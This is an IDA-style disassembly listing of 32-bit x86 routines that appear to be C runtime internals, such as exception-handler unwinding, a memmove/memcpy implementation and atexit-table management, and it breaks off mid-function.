; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4183D7(double)
sub_4183D7 proc near ; CODE XREF: sub_404BA0+83�p
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push dword ptr unk_43DD08
call sub_41CA62
fld [ebp+arg_0]
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
pop ecx
push ecx
and ax, 7FF0h
push ecx
cmp ax, 7FF0h
fstp [esp+18h+var_18]
jnz short loc_41845D
call sub_41C92A
pop ecx
test eax, eax
pop ecx
jle short loc_418440
cmp eax, 2
jle short loc_418432
cmp eax, 3
jnz short loc_418440
fld [ebp+arg_0]
push ebx
push ecx ; int
push ecx
fstp qword ptr [esp]
push 0Ch ; double
call sub_41C23A
add esp, 10h
jmp short loc_4184A2
; ---------------------------------------------------------------------------
loc_418432: ; CODE XREF: sub_4183D7+3F�j
push esi
push ebx
call sub_41CA62
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_4184A2
; ---------------------------------------------------------------------------
loc_418440: ; CODE XREF: sub_4183D7+3A�j
; sub_4183D7+44�j
fld [ebp+arg_0]
fadd dbl_424698
push ebx
push ecx ; double
push ecx
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx
fstp [esp+24h+var_24]
push 0Ch
push 8
jmp short loc_41849A
; ---------------------------------------------------------------------------
loc_41845D: ; CODE XREF: sub_4183D7+2F�j
call sub_41C8EF
fstp [ebp+var_8]
fld [ebp+var_8]
fcomp [ebp+arg_0]
pop ecx
pop ecx
fnstsw ax
sahf
jnz short loc_418480
loc_418472: ; CODE XREF: sub_4183D7+AC�j
push esi
push ebx
call sub_41CA62
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_4184A2
; ---------------------------------------------------------------------------
loc_418480: ; CODE XREF: sub_4183D7+99�j
test bl, 20h
jnz short loc_418472
fld [ebp+var_8]
push ebx ; int
push ecx ; int
push ecx ; int
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx ; int
push ecx ; int
fstp [esp+24h+var_24]
push 0Ch ; int
push 10h ; dwExceptionCode
loc_41849A: ; CODE XREF: sub_4183D7+84�j
call sub_41C28D
add esp, 1Ch
loc_4184A2: ; CODE XREF: sub_4183D7+59�j
; sub_4183D7+67�j ...
pop esi
pop ebx
leave
retn
sub_4183D7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4184A6 proc near ; CODE XREF: sub_41D38A+71�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov esp, [ebx-4]
mov ebp, [ebp+var_4]
jmp eax
sub_4184A6 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_4184DA proc near ; CODE XREF: sub_41D53B+199�p
; sub_41D6FF+3E�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_4184DA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4184E1 proc near ; CODE XREF: sub_41D53B+17F�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_4184E1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4184E8 proc near ; CODE XREF: sub_41869A+5C�p
; sub_41D38A:loc_41D3BB�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov eax, large fs:0
mov [ebp+var_8], eax
mov [ebp+var_4], offset loc_418510
push 0
push [ebp+arg_4]
push [ebp+var_4]
push [ebp+arg_0]
call RtlUnwind ; RtlUnwind
loc_418510: ; DATA XREF: sub_4184E8+11�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and al, 0FDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov eax, large fs:0
mov ebx, [ebp+var_8]
mov [ebx], eax
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_4184E8 endp
; ---------------------------------------------------------------------------
loc_418537: ; CODE XREF: .text:0042383C�j
; .text:00423859�j ...
push ebp
mov ebp, esp
sub esp, 4
push ebx
push esi
push edi
cld
mov [ebp-4], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-4]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_41CF8F
add esp, 20h
mov [ebp+14h], eax
pop edi
pop esi
pop ebx
mov eax, [ebp+14h]
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41856D proc near ; CODE XREF: sub_41D405+73�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_4]
and [ebp+var_14], 0
mov ecx, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
mov [ebp+var_10], offset sub_4185C1
inc eax
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_41D790
mov ecx, eax
mov eax, [ebp+var_14]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_41856D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4185C1 proc near ; DATA XREF: sub_41856D+16�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cld
mov eax, [ebp+arg_4]
push 0
push eax
push dword ptr [eax+10h]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_41CF8F
add esp, 20h
pop ebp
retn
sub_4185C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4185E6 proc near ; CODE XREF: sub_41D1D1+25�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_41869A
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_18], eax
mov eax, [ebp+arg_18]
mov [ebp+var_14], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_10], offset loc_41866C
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_34], 1
mov eax, [ebp+arg_0]
mov [ebp+var_30], eax
mov eax, [ebp+arg_8]
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call dword ptr byte_445EDC+0D4460h
pop ecx
pop ecx
and [ebp+var_34], 0
loc_41866C: ; DATA XREF: sub_4185E6+3C�o
cmp [ebp+var_4], 0
jz short loc_418689
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_418692
; ---------------------------------------------------------------------------
loc_418689: ; CODE XREF: sub_4185E6+8A�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_418692: ; CODE XREF: sub_4185E6+A1�j
mov eax, [ebp+var_34]
pop edi
pop esi
pop ebx
leave
retn
sub_4185E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41869A proc near ; DATA XREF: sub_4185E6+D�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
cld
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
test eax, eax
jz short loc_4186BD
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
push 1
pop eax
jmp short loc_41870A
; ---------------------------------------------------------------------------
loc_4186BD: ; CODE XREF: sub_41869A+12�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
mov eax, [ebp+arg_4]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_41CF8F
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_4186FB
push [ebp+arg_0]
push [ebp+arg_4]
call sub_4184E8
loc_4186FB: ; CODE XREF: sub_41869A+54�j
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp dword ptr [ebx+18h]
; ---------------------------------------------------------------------------
push 1
pop eax
loc_41870A: ; CODE XREF: sub_41869A+21�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41869A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41870F proc near ; CODE XREF: sub_41D02A+C6�p
; sub_41D1D1+43�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
cmp [ebp+arg_4], 0
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+0Ch]
mov ebx, [edi+10h]
mov eax, esi
mov [ebp+arg_0], esi
mov [ebp+var_4], eax
jl short loc_418766
loc_41872D: ; CODE XREF: sub_41870F+52�j
cmp esi, 0FFFFFFFFh
jnz short loc_418737
call sub_41D832
loc_418737: ; CODE XREF: sub_41870F+21�j
mov ecx, [ebp+arg_8]
dec esi
lea eax, [esi+esi*4]
cmp [ebx+eax*4+4], ecx
lea eax, [ebx+eax*4]
jge short loc_41874C
cmp ecx, [eax+8]
jle short loc_418751
loc_41874C: ; CODE XREF: sub_41870F+36�j
cmp esi, 0FFFFFFFFh
jnz short loc_41875D
loc_418751: ; CODE XREF: sub_41870F+3B�j
mov eax, [ebp+arg_0]
dec [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
loc_41875D: ; CODE XREF: sub_41870F+40�j
cmp [ebp+arg_4], 0
jge short loc_41872D
mov eax, [ebp+var_4]
loc_418766: ; CODE XREF: sub_41870F+1C�j
mov ecx, [ebp+arg_C]
inc esi
mov [ecx], esi
mov ecx, [ebp+arg_10]
mov [ecx], eax
cmp eax, [edi+0Ch]
ja short loc_41877A
cmp esi, eax
jbe short loc_41877F
loc_41877A: ; CODE XREF: sub_41870F+65�j
call sub_41D832
loc_41877F: ; CODE XREF: sub_41870F+69�j
lea eax, [esi+esi*4]
pop edi
pop esi
lea eax, [ebx+eax*4]
pop ebx
leave
retn
sub_41870F endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41878C proc near ; CODE XREF: sub_41FD98+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_4187A4
push [ebp+arg_0]
call RtlUnwind ; RtlUnwind
loc_4187A4: ; DATA XREF: sub_41878C+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41878C endp
; =============== S U B R O U T I N E =======================================
sub_4187AC proc near ; DATA XREF: sub_4187CE+A�o
; sub_418836+9�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_4187CD
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_4187CD: ; CODE XREF: sub_4187AC+10�j
retn
sub_4187AC endp
; =============== S U B R O U T I N E =======================================
sub_4187CE proc near ; CODE XREF: .text:0041D4B8�p
; sub_41FD98+67�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_4187AC
push large dword ptr fs:0
mov large fs:0, esp
loc_4187EB: ; CODE XREF: sub_4187CE:loc_418826�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_418828
cmp esi, [esp+1Ch+arg_4]
jz short loc_418828
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_418826
push 101h
mov eax, [ebx+esi*4+8]
call sub_418862
call dword ptr [ebx+esi*4+8]
loc_418826: ; CODE XREF: sub_4187CE+44�j
jmp short loc_4187EB
; ---------------------------------------------------------------------------
loc_418828: ; CODE XREF: sub_4187CE+2A�j
; sub_4187CE+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_4187CE endp
; =============== S U B R O U T I N E =======================================
sub_418836 proc near ; CODE XREF: sub_41D4CB+37�p
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_4187AC
jnz short locret_418858
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_418858
mov eax, 1
locret_418858: ; CODE XREF: sub_418836+10�j
; sub_418836+1B�j
retn
sub_418836 endp
; =============== S U B R O U T I N E =======================================
sub_418859 proc near ; CODE XREF: sub_41D790+1E�p
; sub_41D790+40�p
push ebx
push ecx
mov ebx, 43DD0Ch
jmp short loc_41886C
sub_418859 endp
; =============== S U B R O U T I N E =======================================
sub_418862 proc near ; CODE XREF: sub_4187CE+4F�p
; sub_41FD98+78�p
push ebx
push ecx
mov ebx, 43DD0Ch
mov ecx, [ebp+8]
loc_41886C: ; CODE XREF: sub_418859+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_418862 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_41887C proc near ; CODE XREF: sub_404BA0+5�p
; sub_404D3F+5�p ...
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_41887C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_41889B(LPVOID lpMem)
sub_41889B proc near ; CODE XREF: sub_4051D0+22�p
; .text:00422ED5�p ...
lpMem = dword ptr 4
push [esp+lpMem] ; lpMem
call sub_418227
pop ecx
retn
sub_41889B endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4188B0 proc near ; CODE XREF: sub_40523D+3A�p
; sub_41B099+2EF�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_4188D0
cmp edi, eax
jb loc_418A48
loc_4188D0: ; CODE XREF: sub_4188B0+16�j
test edi, 3
jnz short loc_4188EC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41890C
rep movsd
jmp off_4189F8[edx*4]
; ---------------------------------------------------------------------------
loc_4188EC: ; CODE XREF: sub_4188B0+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_418904
and eax, 3
add ecx, eax
jmp dword ptr loc_41890C+4[eax*4]
; ---------------------------------------------------------------------------
loc_418904: ; CODE XREF: sub_4188B0+46�j
jmp dword ptr loc_418A08[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41890C: ; CODE XREF: sub_4188B0+31�j
; sub_4188B0+8E�j ...
jmp off_41898C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_418920
dd offset loc_41894C
dd offset loc_418970
; ---------------------------------------------------------------------------
loc_418920: ; DATA XREF: sub_4188B0+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_41890C
rep movsd
jmp off_4189F8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41894C: ; DATA XREF: sub_4188B0+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_41890C
rep movsd
jmp off_4189F8[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_418970: ; DATA XREF: sub_4188B0+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_41890C
rep movsd
jmp off_4189F8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41898C dd offset loc_4189EF ; DATA XREF: sub_4188B0:loc_41890C�r
dd offset loc_4189DC
dd offset loc_4189D4
dd offset loc_4189CC
dd offset loc_4189C4
dd offset loc_4189BC
dd offset loc_4189B4
dd offset loc_4189AC
; ---------------------------------------------------------------------------
loc_4189AC: ; CODE XREF: sub_4188B0:loc_41890C�j
; DATA XREF: sub_4188B0+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_4189B4: ; CODE XREF: sub_4188B0:loc_41890C�j
; DATA XREF: sub_4188B0+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_4189BC: ; CODE XREF: sub_4188B0:loc_41890C�j
; DATA XREF: sub_4188B0+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_4189C4: ; CODE XREF: sub_4188B0:loc_41890C�j
; DATA XREF: sub_4188B0+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_4189CC: ; CODE XREF: sub_4188B0:loc_41890C�j
; DATA XREF: sub_4188B0+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4189D4: ; CODE XREF: sub_4188B0:loc_41890C�j
; DATA XREF: sub_4188B0+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4189DC: ; CODE XREF: sub_4188B0:loc_41890C�j
; DATA XREF: sub_4188B0+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4189EF: ; CODE XREF: sub_4188B0:loc_41890C�j
; DATA XREF: sub_4188B0:off_41898C�o
jmp off_4189F8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4189F8 dd offset loc_418A08 ; DATA XREF: sub_4188B0+35�r
; sub_4188B0+92�r ...
dd offset loc_418A10
dd offset loc_418A1C
dd offset loc_418A30
; ---------------------------------------------------------------------------
loc_418A08: ; CODE XREF: sub_4188B0+35�j
; sub_4188B0+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_418A10: ; CODE XREF: sub_4188B0+35�j
; sub_4188B0+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_418A1C: ; CODE XREF: sub_4188B0+35�j
; sub_4188B0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_418A30: ; CODE XREF: sub_4188B0+35�j
; sub_4188B0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_418A48: ; CODE XREF: sub_4188B0+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_418A7C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_418A70
std
rep movsd
cld
jmp off_418B90[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_418A70: ; CODE XREF: sub_4188B0+1B1�j
; sub_4188B0+208�j ...
neg ecx
jmp off_418B40[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_418A7C: ; CODE XREF: sub_4188B0+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_418A94
and eax, 3
sub ecx, eax
jmp dword ptr loc_418A94+4[eax*4]
; ---------------------------------------------------------------------------
loc_418A94: ; CODE XREF: sub_4188B0+1D6�j
; DATA XREF: sub_4188B0+1DD�r
jmp off_418B90[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_418AA8
dd offset loc_418AC8
dd offset loc_418AF0
; ---------------------------------------------------------------------------
loc_418AA8: ; DATA XREF: sub_4188B0+1EC�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_418A70
std
rep movsd
cld
jmp off_418B90[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_418AC8: ; DATA XREF: sub_4188B0+1F0�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_418A70
std
rep movsd
cld
jmp off_418B90[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_418AF0: ; DATA XREF: sub_4188B0+1F4�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_418A70
std
rep movsd
cld
jmp off_418B90[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_418B44
dd offset loc_418B4C
dd offset loc_418B54
dd offset loc_418B5C
dd offset loc_418B64
dd offset loc_418B6C
dd offset loc_418B74
off_418B40 dd offset loc_418B87 ; DATA XREF: sub_4188B0+1C2�r
; ---------------------------------------------------------------------------
loc_418B44: ; DATA XREF: sub_4188B0+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_418B4C: ; DATA XREF: sub_4188B0+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_418B54: ; DATA XREF: sub_4188B0+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_418B5C: ; DATA XREF: sub_4188B0+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_418B64: ; DATA XREF: sub_4188B0+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_418B6C: ; DATA XREF: sub_4188B0+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_418B74: ; DATA XREF: sub_4188B0+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_418B87: ; CODE XREF: sub_4188B0+1C2�j
; DATA XREF: sub_4188B0:off_418B40�o
jmp off_418B90[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_418B90 dd offset loc_418BA0 ; DATA XREF: sub_4188B0+1B7�r
; sub_4188B0:loc_418A94�r ...
dd offset loc_418BA8
dd offset loc_418BB8
dd offset loc_418BCC
; ---------------------------------------------------------------------------
loc_418BA0: ; CODE XREF: sub_4188B0+1B7�j
; sub_4188B0:loc_418A94�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_418BA8: ; CODE XREF: sub_4188B0+1B7�j
; sub_4188B0:loc_418A94�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_418BB8: ; CODE XREF: sub_4188B0+1B7�j
; sub_4188B0:loc_418A94�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_418BCC: ; CODE XREF: sub_4188B0+1B7�j
; sub_4188B0:loc_418A94�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_4188B0 endp
; =============== S U B R O U T I N E =======================================
sub_418BE5 proc near ; CODE XREF: sub_4052A4+34�p
; sub_4052A4+4F�p ...
arg_0 = dword ptr 4
push 1
push [esp+4+arg_0]
call sub_418187
pop ecx
pop ecx
retn
sub_418BE5 endp
; =============== S U B R O U T I N E =======================================
sub_418BF3 proc near ; CODE XREF: sub_418C60+4�p
arg_0 = dword ptr 4
push esi
push dword ptr byte_445EDC+0D5A5Ch ; lpMem
call sub_41D888
mov edx, dword ptr byte_445EDC+0D5A5Ch
pop ecx
mov ecx, dword ptr byte_445EDC+0D5A58h
mov esi, ecx
sub esi, edx
add esi, 4
cmp eax, esi
pop esi
jnb short loc_418C52
push edx ; lpMem
call sub_41D888
add eax, 10h
push eax ; dwBytes
push dword ptr byte_445EDC+0D5A5Ch ; lpMem
call sub_419C9F
add esp, 0Ch
test eax, eax
jnz short loc_418C35
retn
; ---------------------------------------------------------------------------
loc_418C35: ; CODE XREF: sub_418BF3+3F�j
mov ecx, dword ptr byte_445EDC+0D5A58h
sub ecx, dword ptr byte_445EDC+0D5A5Ch
mov dword ptr byte_445EDC+0D5A5Ch, eax
sar ecx, 2
lea ecx, [eax+ecx*4]
mov dword ptr byte_445EDC+0D5A58h, ecx
loc_418C52: ; CODE XREF: sub_418BF3+23�j
mov eax, [esp+arg_0]
mov [ecx], eax
add dword ptr byte_445EDC+0D5A58h, 4
retn
sub_418BF3 endp
; =============== S U B R O U T I N E =======================================
sub_418C60 proc near ; CODE XREF: .text:004053AB�p
; sub_4230DE+5�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_418BF3
neg eax
sbb eax, eax
pop ecx
neg eax
dec eax
retn
sub_418C60 endp
; ---------------------------------------------------------------------------
push 80h
call sub_418175
test eax, eax
pop ecx
mov dword ptr byte_445EDC+0D5A5Ch, eax
jnz short loc_418C93
push 18h
call sub_41A45C
mov eax, dword ptr byte_445EDC+0D5A5Ch
pop ecx
loc_418C93: ; CODE XREF: .text:00418C84�j
and dword ptr [eax], 0
mov eax, dword ptr byte_445EDC+0D5A5Ch
mov dword ptr byte_445EDC+0D5A58h, eax
retn
; =============== S U B R O U T I N E =======================================
sub_418CA1 proc near ; CODE XREF: sub_41AE81+11B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_418CB8
add esp, 10h
retn
sub_418CA1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418CB8 proc near ; CODE XREF: sub_418CA1+E�p
; sub_418EC0+E�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
and [ebp+var_8], 0
push esi
push edi
mov edi, [ebp+arg_0]
mov bl, [edi]
lea esi, [edi+1]
mov [ebp+var_4], esi
loc_418CD0: ; CODE XREF: sub_418CB8+46�j
cmp cbMultiByte, 1
jle short loc_418CE8
movzx eax, bl
push 8 ; int
push eax ; CharType
call sub_41ADC4
pop ecx
pop ecx
jmp short loc_418CF7
; ---------------------------------------------------------------------------
loc_418CE8: ; CODE XREF: sub_418CB8+1F�j
mov ecx, dword_43DD30
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 8
loc_418CF7: ; CODE XREF: sub_418CB8+2E�j
